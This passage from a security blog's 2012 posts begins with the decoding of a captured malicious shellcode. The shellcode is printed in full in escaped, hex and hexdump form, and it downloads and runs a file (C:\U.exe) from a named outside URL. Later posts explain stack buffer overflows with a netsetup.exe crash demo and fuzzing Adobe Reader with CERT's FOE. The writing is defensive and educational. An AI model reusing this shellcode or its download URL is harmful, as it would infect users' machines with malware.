%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u54EB%u758B%u8B3C%u3574%u0378%u56F5%u768B%u0320%u33F5%u49C9%uAD41%uDB33%u0F36%u14BE%u3828%u74F2%uC108%u0DCB%uDA03%uEB40%u3BEF%u75DF%u5EE7%u5E8B%u0324%u66DD%u0C8B%u8B4B%u1C5E%uDD03%u048B%u038B%uC3C5%u7275%u6D6C%u6E6F%u642E%u6C6C%u4300%u5C3A%u2E55%u7865%u0065%uC033%u0364%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0840%u09EB%u408B%u8D34%u7C40%u408B%u953C%u8EBF%u0E4E%uE8EC%uFF84%uFFFF%uEC83%u8304%u242C%uFF3C%u95D0%uBF50%u1A36%u702F%u6FE8%uFFFF%u8BFF%u2454%u8DFC%uBA52%uDB33%u5353%uEB52%u5324%uD0FF%uBF5D%uFE98%u0E8A%u53E8%uFFFF%u83FF%u04EC%u2C83%u6224%uD0FF%u7EBF%uE2D8%uE873%uFF40%uFFFF%uFF52%uE8D0%uFFD7%uFFFF%u7468%u7074%u2F3A%u6D2F%u3370%u722E%u6165%u696C%u657A%u682E%u2F6B%u6F6C%u6967%u2F6E%u6E69%u6564%u2E78%u6870%u3F70%u6572%u3D67%u0001

For this, we can use a variety of tools or even scripting.  The key point to remember is that this is machine code and is intended to be run directly in memory by redirecting EIP to the NOP sled in the beginning and then execute the rest of instructions.  Another thing to remember is that JavaScript uses a least significant bit (LSB) unicode format, which for our purposes means that we swap the byte pairs (i.e. change u3574 to u7435).  You can do this in your favorite scripting language.  You can also use Malzilla's "Misc Decoders" tab for this.  Me, I like awk, so I do sloppy things like this with the payload (after removing the unescape wrapper):

awk 'gsub("%u"," ") { x=1; while(x<=NF) { printf "0x" substr($x,3,2) ",0x" substr($x,1,2) ","; x++; } }'

In any case, you should have something like this in the end:

0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0xEB,0x54,0x8B,0x75,0x3C,0x8B,0x74,0x35,0x78,0x03,0xF5,0x56,0x8B,0x76,0x20,0x03,0xF5,0x33,0xC9,0x49,0x41,0xAD,0x33,0xDB,0x36,0x0F,0xBE,0x14,0x28,0x38,0xF2,0x74,0x08,0xC1,0xCB,0x0D,0x03,0xDA,0x40,0xEB,0xEF,0x3B,0xDF,0x75,0xE7,0x5E,0x8B,0x5E,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5E,0x1C,0x03,0xDD,0x8B,0x04,0x8B,0x03,0xC5,0xC3,0x75,0x72,0x6C,0x6D,0x6F,0x6E,0x2E,0x64,0x6C,0x6C,0x00,0x43,0x3A,0x5C,0x55,0x2E,0x65,0x78,0x65,0x00,0x33,0xC0,0x64,0x03,0x40,0x30,0x78,0x0C,0x8B,0x40,0x0C,0x8B,0x70,0x1C,0xAD,0x8B,0x40,0x08,0xEB,0x09,0x8B,0x40,0x34,0x8D,0x40,0x7C,0x8B,0x40,0x3C,0x95,0xBF,0x8E,0x4E,0x0E,0xEC,0xE8,0x84,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x3C,0xFF,0xD0,0x95,0x50,0xBF,0x36,0x1A,0x2F,0x70,0xE8,0x6F,0xFF,0xFF,0xFF,0x8B,0x54,0x24,0xFC,0x8D,0x52,0xBA,0x33,0xDB,0x53,0x53,0x52,0xEB,0x24,0x53,0xFF,0xD0,0x5D,0xBF,0x98,0xFE,0x8A,0x0E,0xE8,0x53,0xFF,0xFF,0xFF,0x83,0xEC,0x04,0x83,0x2C,0x24,0x62,0xFF,0xD0,0xBF,0x7E,0xD8,0xE2,0x73,0xE8,0x40,0xFF,0xFF,0xFF,0x52,0xFF,0xD0,0xE8,0xD7,0xFF,0xFF,0xFF,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x6D,0x70,0x33,0x2E,0x72,0x65,0x61,0x6C,0x69,0x7A,0x65,0x2E,0x68,0x6B,0x2F,0x6C,0x6F,0x67,0x69,0x6E,0x2F,0x69,0x6E,0x64,0x65,0x78,0x2E

Now, you can convert the hex strings to binary in any number of ways.  Here's a quick way to do this with xxd and hexdump (assuming you have the above text in file /tmp/payload.hex):




xxd -r -ps /tmp/payload.hex | hexdump -Cv



The output should look like this:



00000000  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
00000010  90 90 90 90 eb 54 8b 75  3c 8b 74 35 78 03 f5 56  |.....T.u<.t5x..V|
00000020  8b 76 20 03 f5 33 c9 49  41 ad 33 db 36 0f be 14  |.v ..3.IA.3.6...|
00000030  28 38 f2 74 08 c1 cb 0d  03 da 40 eb ef 3b df 75  |(8.t......@..;.u|
00000040  e7 5e 8b 5e 24 03 dd 66  8b 0c 4b 8b 5e 1c 03 dd  |.^.^$..f..K.^...|
00000050  8b 04 8b 03 c5 c3 75 72  6c 6d 6f 6e 2e 64 6c 6c  |......urlmon.dll|
00000060  00 43 3a 5c 55 2e 65 78  65 00 33 c0 64 03 40 30  |.C:\U.exe.3.d.@0|
00000070  78 0c 8b 40 0c 8b 70 1c  ad 8b 40 08 eb 09 8b 40  |x..@..p...@....@|
00000080  34 8d 40 7c 8b 40 3c 95  bf 8e 4e 0e ec e8 84 ff  |4.@|.@<...N.....|
00000090  ff ff 83 ec 04 83 2c 24  3c ff d0 95 50 bf 36 1a  |......,$<...P.6.|
000000a0  2f 70 e8 6f ff ff ff 8b  54 24 fc 8d 52 ba 33 db  |/p.o....T$..R.3.|
000000b0  53 53 52 eb 24 53 ff d0  5d bf 98 fe 8a 0e e8 53  |SSR.$S..]......S|
000000c0  ff ff ff 83 ec 04 83 2c  24 62 ff d0 bf 7e d8 e2  |.......,$b...~..|
000000d0  73 e8 40 ff ff ff 52 ff  d0 e8 d7 ff ff ff 68 74  |s.@...R.......ht|
000000e0  74 70 3a 2f 2f 6d 70 33  2e 72 65 61 6c 69 7a 65  |tp://mp3.realize|
000000f0  2e 68 6b 2f 6c 6f 67 69  6e 2f 69 6e 64 65 78 2e  |.hk/login/index.|
00000100



After examining the output, regardless of how you do it, we find the following strings, including a URL that is used for a secondary download: 
  • urlmon.dll
  • C:\U.exe
  • http[:]//mp3.realize.hk/login/index.php?reg=

IN CLOSING
When you can quickly produce these types of results to your network defenders, it goes a long way to detecting and preventing infections on your network.  

Thanks for reading and hopefully you've found this post informative.  If there are topics you would like to see in the future, please drop us a line.


Thursday, November 8, 2012

Restricting Server Internet Access

It should be a no-brainer not to do this, but you'd be amazed at how many different environments I've worked in where the security/networking staff would allow their servers to talk outbound using HTTP/HTTPS.  While there are some occasions where this is necessary, it should certainly be limited to only the critical functions and requisite URLs/IP addresses.  Allowing servers to access the Internet can have potentially dangerous consequences resulting in loss of data confidentiality, integrity and availability. 

Circumstances where a server might need to get out to the Internet include anti-virus updates, operating system patches an 3rd party application updates such as from Adobe or Java.  These processes should be configured to funnel their traffic through "bridgehead servers"  that function for this purpose.  Microsoft provides WSUS (Windows Server Update Services) that can be used as a centralized point for providing updates not only to your clients, but your servers as well.  Additionally, McAfee, Symantec, and the other AV virus vendors generally provide the ability to allow just one device to go to the Internet and get the updates for distribution amongst the rest of your environment.  While this provides efficiency and in some cases a centralized reporting structure for your client devices, it should be viewed as a necessity for servers.  So, use your proxy server or your firewall to only allow the connections from the boxes that are acting as bridgeheads to the corresponding service provider on the Internet and be done with it.  While it is not impossible for Microsoft or any of the others to be compromised, the chances are pretty low and it is a risk worth taking. 

As I've mentioned in my previous posts, it is critical that we as network/security engineers try to eliminate as much unneeded traffic as possible, thus providing ourselves the ability to more closely examine the traffic that is allowed.  Also, getting back to the point of servers specifically, with bridgehead servers for critical update functions, we can deny all outbound web traffic from our server farm, thus potentially eliminating any C2 channels. If you have a Blue Coat or other brand of web filtering proxy, you can even use the builitin categories or create your own that can include the necessary sites to allow our software to remain updated.  Additionally, it will prevent administrators from surfing the web from servers.  Again, it was amazing to see environments where system admins would login to servers and check their webmail or go to any number of sites that they should not be viewing from a server.  Chances are when logged onto servers, the account will have elevated credentials thus giving any infection a more significant impact.   With no ability to get to the Internet, the server is better protected against infection and if somehow infected has a decreased likelihood of allowing C2 to an attacker, both effects we should strive for as security professionals. 

Thursday, November 1, 2012

Regarding Buffer Overflows

In the network security world, vulnerabilities and exploits are currency.  Without vulnerabilities, there would be no exploits.  Without exploits, there would be no network attacks.  Exploits can come in many forms and recently, the user has been the vulnerability: poor password security, phishing emails and other social engineering attacks have become more prevalent.  This is due to hardened network defenses, increased patching and the general lack of new exploitable software vulnerabilities.  Years ago, a system could be taken over by simply sending a network packet or two to the target system from halfway around the world.  But how did that happen?  What is different now?  

Today, there is more awareness of Buffer Overflows in the development world.  This, along with technical enhancements such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) and Stack Canaries (that shut down programs that misbehave) limits the impact of this vulnerability.  But there are always workarounds and it is essentially an arms race between the attackers and defenders.  Fundamentally, Buffer Overflows are still a problem, but it's not as easy as it once was.

This post aims to describe Buffer Overflow vulnerabilities in simple terms as well as provide a real world example.  It's not an easy task, mainly because of the technical details, but let's try anyway.

WHAT IS AN OVERFLOW?
An overflow is what it sounds like: too much of something that doesn't fit in a container will overflow.  In programming terms, these are typically stack overflows or heap overflows.  The main difference is where in memory this overflow happens.  When a program needs to take in information, it allocates memory of a size that the programmer has specified and attempts to write data to that memory space.  If the amount of data written is larger than the space provided, an overflow occurs.  When this happens, other parts of memory are overwritten, which may or may not cause problems, but typically they will overwrite something important, causing memory corruption.  When the running program tries to read from that part of memory, it usually crashes.  

An attacker, after discovering that a program has a buffer overflow problem, can customize the data corruption in an attempt to control the crash.  Controlling the crash will allow the attacker to control the system.

CONTROLLING THE CRASH
How does an attacker control the crash?  By controlling EIP.  To illustrate this, we will demonstrate a stack buffer overflow and a simple, imaginary program:


C:\TEMP>hello.exe Mike
Hi there, Mike!

The imaginary program above, when run, will print out the words "Hi there, " followed by whatever what given as an argument to the program.  In this case, the name "Mike".  This is then followed by an exclamation point and a new line.  The program then exits.

The program looks like this at an extremely high level:

Create Name Variable (4 bytes);
Read Name from Command Line;
Print "Hi there, " + Name + "!\n";
exit;

When the program starts, it will allocate memory space for the Name variable.  In our example, let's say it allocates 4 bytes.  If we then provide a longer name like "Emily", with 5 characters, when the program reads "Emily" and tries to put it into the Name variable, we have an overflow.  Then we may get a nice little program crash. (For the purposes of this post, I won't go into details like the NULL or CRLF characters at the end of the input string).

Even a simple program like above will use almost 50 lines of CPU instructions.  Any function calls, like the Print command, can easily add to the number of instructions that a program needs.  You can imagine how many instructions are needed for more useful programs.  Luckily, today's processors can execute hundreds of billions of instructions a second, although even those seem slow at times.  

So where does EIP come in?  EIP exists in a special part of memory, called a register, that contains the memory address of the next instruction to execute.  After an instruction executes, EIP is changed to the memory address of the next instruction to run.  Essentially, EIP is where the CPU looks for the next thing to do.

STACKS
There is another part of memory called the "stack."  This is where programs can store temporary information for use later (like "Mike" or "Emily").  In the example above, the second instruction uses a function to read user input into the Name variable.  In this case, let's pretend that the function used to write to the name variable is "strcpy" (a common function to copy strings - String Copy), which has its instructions in memory address 0x08048.  When the CPU gets to this part of the program, it will call that function using a jump (JMP) instruction.  But before it does that, it copies the address of the next instruction into the stack so it knows where to go back to when it's done.  So at a high level, this program looks like:

0x00001: Create Name
0x00005: strcpy (0x08048) Name from Command Line
0x00008: Print (printf, located at 0x080a9) "Hi there," + Name + "!\n"
0x0000a: exit

When our hello.exe program runs, the CPU executes the instructions at memory address 0x00001.  The next line of code is at memory address 0x00005.  The CPU then changes EIP to 0x00005. Then 0x00005 is executed, but since it points to another memory location outside of the normal execution, the address 0x00008 is written to the stack as a sort of bookmark for where to go back to when the strcpy function is completed.  The command "JMP 0x08048" is then executed.  EIP is changed to 0x08048.  Execution begins at 0x08048 until it is done.  When it is complete, the CPU instruction "RET" (short for return) is executed.  This tells the CPU to take the last value written to the stack, in this case 0x00008 and then copy that to EIP.  The CPU then continues execution from 0x00008.

Command execution is then:

0x00001
0x00005 (JMP to 0x08048, copy 0x00008 to the stack)
0x08048
RET (copy top of stack (0x00008) to EIP)
0x00008 (JMP to 0x080a9, copy 0x0000a to the stack)
RET (copy top of stack (0x0000a) to EIP)
0x0000a

PROGRAM CRASH
In our example, we used "Emily" as the Name.  Now, since the Name only has 4 bytes, when "Emily" is written to memory, the last letter "y" (0x79) is written past the 4 bytes.  What is past the 4 bytes?  Who knows?  Noone really, at first.  But one thing about computers is that they are consistent.  The memory structures are the same every time a program is run.  If the overflow goes into the area of the stack where something important is written, say the address to return to (0x00008), when the strcpy function is done and RET is executed, the CPU will try to copy 0x00008 into EIP, except in this case, it's been changed to 0x79008.  The CPU will copy that into EIP and then try to execute the instructions at 0x79008, which is likely garbage and the CPU will error out with "illegal instruction at 0x79008."

On the next run, an attacker could then simply change "Emily" into different values that means something, causing EIP to point to a part of memory the attacker controls.  Remember that an overflow is continuously written to memory.  If we used a very long name instead of Emily, the name we chose will be in memory.  Whole swaths of memory will be overwritten.  Since the attacker can now control EIP, they can simply change it to the memory address of instructions other than the normal ones and then now the attacker has owned your system.

REAL WORLD EXAMPLE
If you want to see this in the real world, fire up an old Windows XP system.  There is a command line program built-in called "netsetup.exe".  If you have a newer system, you can still try this, but it's been patched sometime since Windows XP, so your mileage will vary.  In any case, it's still worth seeing the process in action.  Note that Windows 7 does not have netsetup.exe.

Step 1: Open a command line prompt by running "cmd.exe"
Step 2: Run the program netsetup.exe (it's in the PATH, so you can run it from anywhere).
Step 3: Give netsetup.exe an argument of AAAA:


C:\TEMP>netsetup.exe AAAA

You will get a box that says "Command Line Syntax Error"

Step 4: Add more AAAAs until you get a program crash (hint: it starts to crash at 271 characters).  


C:\TEMP>netsetup.exe AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



If you examine the technical details of the crash, you should find that one of the registers (Windows calls it "P7") has a value of 41414141.  A capital "A" has a hex value of 0x41.  What you are seeing is EIP with a value of 0x41414141, which caused the program to crash because it tried to execute instructions at that memory address.  If you change the letters at the end of your 271 characters to say ABCD, you will see P7 change to something like 44434241.  You are now controlling EIP.

At this point, one could then fire up a debugger and examine memory when the program crashes and find out where the rest of the "AAAAAA"s went in memory, attempt to change the "AAAAAA"s to actual instructions and then modify the last part to point to where the attacker's instructions are in memory.  

TERMS OF ENDEARMENT
The series of characters that make up the attacker's instructions (usually minimal code to give the attacker some level of control) is called the payload.  The coding problem of netsetup.exe that allows memory to be overwritten is called a vulnerability.  If the attacker can actually run his own code against this vulnerability, this would be an exploitable vulnerability.  If not and all she can do is crash the program, it's still a vulnerability but not exploitable.

FULL DISCLOSURE
Since netsetup.exe is a really old program, this is not really a vulnerability disclosure.  I do not know if netsetup is fully exploitable or not.  This would require local execution since netsetup.exe is not a networked program and the input to the program comes from the command line.  But the process for finding vulnerabilities in network-aware programs is the same: keep feeding it garbage and wait for it to crash.  When it crashes, examine memory and see if there is some kind of overflow involved and if as an attacker, you can craft input to the program via network packets, that would give you control of EIP.  "Fuzzing" programs (like this one) automate a lot of this manual process by heaping varying amounts and types of data at a program and then records the crashes.  Vulnerability hunters generally write their own fuzzers to help with this.  Finally, it is important to point out that these are really simple examples.  There is a lot more involved in vulnerability hunting and exploitation, but this is the gist of it.

IF YOU'VE READ THIS FAR
Hopefully this gives some clarity to some of the terms that are thrown around in the network security world as opposed to adding to the confusion.  In future posts, we'll examine process spawning and the different types of exploits (local, remote, privilege escalation).  Thanks for reading!

Thursday, October 25, 2012

Fuzzing the Iceberg: Finding Vulnerabilities in Third Party Software

The Iceberg
Since 2005, the number of vulnerabilities revealed annually has been generally consistent, between 7,000-9,000 [1]. According to Carnegie Mellon University's CERT/Software Engineering Institute, this number is 'likely an order of magnitude lower' than the total number of vulnerabilities discovered in the wild. Amazingly, based on their expertise in software engineering and experience fuzzing, CERT believes that about 70,000 software vulnerabilities are found each year and simply not reported [2].

Typically, 75% of vulnerabilities can be attributed to third party applications. The other 25% are due to vulnerabilities within Microsoft programs and Operating Systems [3]. The largest of these third party culprits are Adobe and Oracle.  These vendors not only represent a large number of vulnerabilities discovered, but they also represent a stunning number of the critical vulnerabilities revealed each year.

Fuzzing Adobe Reader
With this in mind, we can use the Failure Observation Engine 2 (FOE) by CERT to automatically identify potential vulnerabilities in the Windows based applications. The FOE fuzzer works by taking an input of seedfiles which are manipulated with python scripts. These manipulated seedfiles are then sent as input to an application in hopes of making it crash. Upon detection of a "crasher case", FOE can capture the state of memory and registers. From this information, it can determine whether or not the crash represents an exploitable overflow case. In the basic example below, I'll walk you through the steps I followed to start fuzzing Adobe Reader 11.0.0 for file format vulnerabilities. 

You can download FOE2 from the CERT Website [4]. I recommend installing FOE on a fully patched machine running Windows Vista, 7, or 8 (your preferred target). Also, download the latest version of of the application you'd like to fuzz. In our case below, we can visit Adobe's site to download the latest version of Adobe Reader 11. Once you've got your machine configured with the software you wish to fuzz, FOE2 can be easily configured to launch against your application via its configuration files found in the /configs/ directory. Here we can set our campaign name, control the target application, and make adjustments to how the fuzzer operates. In order to test Adobe Reader, we must change the target application in our configuration file. Otherwise, you'll be testing an application that was installed alongside the FOE application.

foe.yaml
#####################################################################
# Fuzz target options:
#
# program: Path to fuzzing target executable (Adobe Reader below)
# cmdline_template: Used to specify the command-line invocation
# of the target
#####################################################################

target:
    program: C:\Program Files (x86)\Adobe\Reader 11.0\Reader    \AcroRd32.exe
    cmdline_template: $PROGRAM $SEEDFILE NUL

Next, I'll find some seedfiles. There is nothing special about seedfiles, but you'll probably want to have at least one or two legitimate PDF files included in your seedfile directory. The configuration file can also be tuned to manipulate the seedfiles in different ways. It can be useful to play with these features as you execute different campaigns.

Once you've completed the steps above, running foe is as simple as:

C:\FOE2\>foe2.py --c configs\foe.yaml

FOE will feed Adobe Reader random input until you stop it or it breaks the virtual machine.  This process can last for weeks depending on your settings. To view the results, simply browse to the FOE2\results directory. You can view the results while the fuzzer is running. If FOE was successful in crashing Adobe Reader, you'll see a folder in this directory with one of four names. "EXPLOITABLE", "PROBABLY_EXPLOITABLE", "PROBABLE_NOT_EXPLOITABLE", and "UNKNOWN". With any luck, you'll find some exploitable crash scenarios. In the future, I will document more advanced techniques for using FOE and it's robust set of configuration options.

What's next?
Crafting the overflow, controlling EIP, and inserting shellcode. Next week, Juan Miguel Paredes will bring us an Introduction to Buffer Overflows and walk us through this process.

Disclosure 
Cert will accept and work with the vendors whose vulnerabilities are reported through the following form: https://forms.cert.org/VulReport/


References


[1] IBM X-Force 2011 Trend and Risk Report: https://www-935.ibm.com/services/us/iss/xforce/trendreports/

[2] CERT/SEI. How to More Effectively Manage Vulnerabilities and the Attacks that Exploit them: http://www.cert.org/podcast/transcripts/20120925manion-transcript.pdf

[3] Securina Yearly Report 2011: http://secunia.com/company/2011_yearly_report/

[4] FOE Scanner Download: http://www.cert.org/vuls/diDisclosurescovery/foe.html